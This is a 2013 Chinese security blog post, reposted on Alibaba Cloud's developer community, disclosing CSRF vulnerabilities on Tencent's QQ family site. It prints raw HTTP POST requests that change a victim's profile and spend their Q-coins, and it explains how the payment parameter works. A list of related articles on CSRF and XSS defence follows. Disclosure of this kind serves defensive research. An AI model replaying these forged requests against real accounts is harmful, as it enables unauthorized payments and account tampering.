AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

腾讯QQ家族任意支付QB+修改资料csrf

2013-07-12 1024
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: http://jz.qq.com/m_card.shtml POST /cgi-bin/league_change_userinfo HTTP/1.1 Host: jz.qq.com Connection: keep-alive Content-Length: 171 Cache-Co...

http://jz.qq.com/m_card.shtml

wps_clip_image-10865

POST /cgi-bin/league_change_userinfo HTTP/1.1

Host: jz.qq.com

Connection: keep-alive

Content-Length: 171

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin: http://jz.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://jz.qq.com/inc/m_card.shtml

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

wps_clip_image-14458

mobile=13800138000&email=y0umer%40sina.com&nation=1&province=1&city=1&signature=%CE%D2%B2%BB%B8%F6%D0%D4&introduce=%D0%A3%B3%A4&security=1&isaccept=1&image.x=38&image.y=16

wps_clip_image-3473

wps_clip_image-32098

wps_clip_image-23198

还有可以csrf劫持创建家族.. 修改家族..

随意加入家族..

wps_clip_image-3854

据说还可以随意挥霍QB..

任意支付漏洞:

POST /cgi-bin/league_month_pay HTTP/1.1

Host: jz.qq.com

Connection: keep-alive

Content-Length: 46

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin: http://jz.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://jz.qq.com/cgi-bin/league_month_show?leagueid=716740

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

wps_clip_image-22213

Month 就相当于支付几QB, 1是一月  1月2qb..

wps_clip_image-13375

利用说明:任意支付只是面向没有设置QB支付验证的号码,并且加入了家族才能支付成功(因此比较鸡肋)

文章标签:
Windows
Web App开发
关键词:
qq CSRF
y0umer
目录
相关文章
y0umer
|
Web App开发
腾讯QQ积分CSRF导致积分任意挥霍(我的积分为什么少了)
触发点:http://jifen.qq.com/html5/index.html?ADTAG=JIFEN.MART.INDEX 随意兑换一个商品: 因为刚才我已经兑换过了,所以积分没有了.. 没关系,我们换一个QQ! 首先我们查询下积分: 然后我们直接访问以下链接: http://jifen.
y0umer
788 0
东方睿赢
|
7月前
|
JavaScript 安全 前端开发
js开发:请解释什么是XSS攻击和CSRF攻击,并说明如何防范这些攻击。
XSS和CSRF是两种常见的Web安全威胁。XSS攻击通过注入恶意脚本盗取用户信息或控制账户,防范措施包括输入验证、内容编码、HTTPOnly Cookie和CSP。CSRF攻击则诱使用户执行未经授权操作,防范手段有CSRF Tokens、双重验证、Referer检查和SameSite Cookie属性。开发者应采取这些防御措施并定期进行安全审计以增强应用安全性。
东方睿赢
130 0
阿甘兄
|
安全 NoSQL Java
互联网并发与安全系列教程(06) - 常见的Web安全漏洞(CSRF攻击)
互联网并发与安全系列教程(06) - 常见的Web安全漏洞(CSRF攻击)
阿甘兄
124 0
土木林森
|
7月前
|
缓存 安全 JavaScript
前端安全:Vue应用中防范XSS和CSRF攻击
【4月更文挑战第23天】本文探讨了在Vue应用中防范XSS和CSRF攻击的重要性。XSS攻击通过注入恶意脚本威胁用户数据,而CSRF则利用用户身份发起非授权请求。防范措施包括:对输入内容转义、使用CSP、选择安全的库;采用Anti-CSRF令牌、同源策略和POST请求对抗CSRF;并实施代码审查、更新依赖及教育团队成员。通过这些实践,可提升Vue应用的安全性,抵御潜在攻击。
土木林森
996 0
wljslmz
|
16天前
|
安全 前端开发 JavaScript
什么是 CSRF 攻击?如何启用 CSRF 保护来抵御该攻击?
什么是 CSRF 攻击?如何启用 CSRF 保护来抵御该攻击?
wljslmz
49 5
html的七十二变
|
1月前
|
存储 Web App开发 安全
如何防范 CSRF 攻击
CSRF(跨站请求伪造)攻击是一种常见的安全威胁。防范措施包括:使用Anti-CSRF Token、检查HTTP Referer、限制Cookie作用域、采用双重提交Cookie机制等,确保请求的合法性与安全性。
html的七十二变
62 5
html的七十二变
|
1月前
|
网络安全 数据安全/隐私保护
什么是 CSRF 攻击
CSRF(跨站请求伪造)攻击是指攻击者诱导用户点击恶意链接或提交表单,利用用户已登录的身份在目标网站上执行非授权操作,如转账、修改密码等。这种攻击通常通过嵌入恶意代码或链接实现。
html的七十二变
54 2
土木林森
|
1月前
|
安全 前端开发 Java
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第26天】Web安全是现代软件开发的重要领域,本文深入探讨了XSS和CSRF两种常见攻击的原理及防御策略。针对XSS,介绍了输入验证与转义、使用CSP、WAF、HTTP-only Cookie和代码审查等方法。对于CSRF,提出了启用CSRF保护、设置CSRF Token、使用HTTPS、二次验证和用户教育等措施。通过这些策略,开发者可以构建更安全的Web应用。
土木林森
84 4
土木林森
|
1月前
|
安全 Go PHP
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第27天】本文深入解析了Web安全中的XSS和CSRF攻击防御策略。针对XSS,介绍了输入验证与净化、内容安全策略(CSP)和HTTP头部安全配置;针对CSRF,提出了使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie等方法,帮助开发者有效保护网站和用户数据安全。
土木林森
67 2
土木林森
|
1月前
|
存储 安全 Go
Web安全基础:防范XSS与CSRF攻击的方法
【10月更文挑战第25天】Web安全是互联网应用开发中的重要环节。本文通过具体案例分析了跨站脚本攻击(XSS)和跨站请求伪造(CSRF)的原理及防范方法,包括服务器端数据过滤、使用Content Security Policy (CSP)、添加CSRF令牌等措施,帮助开发者构建更安全的Web应用。
土木林森
88 3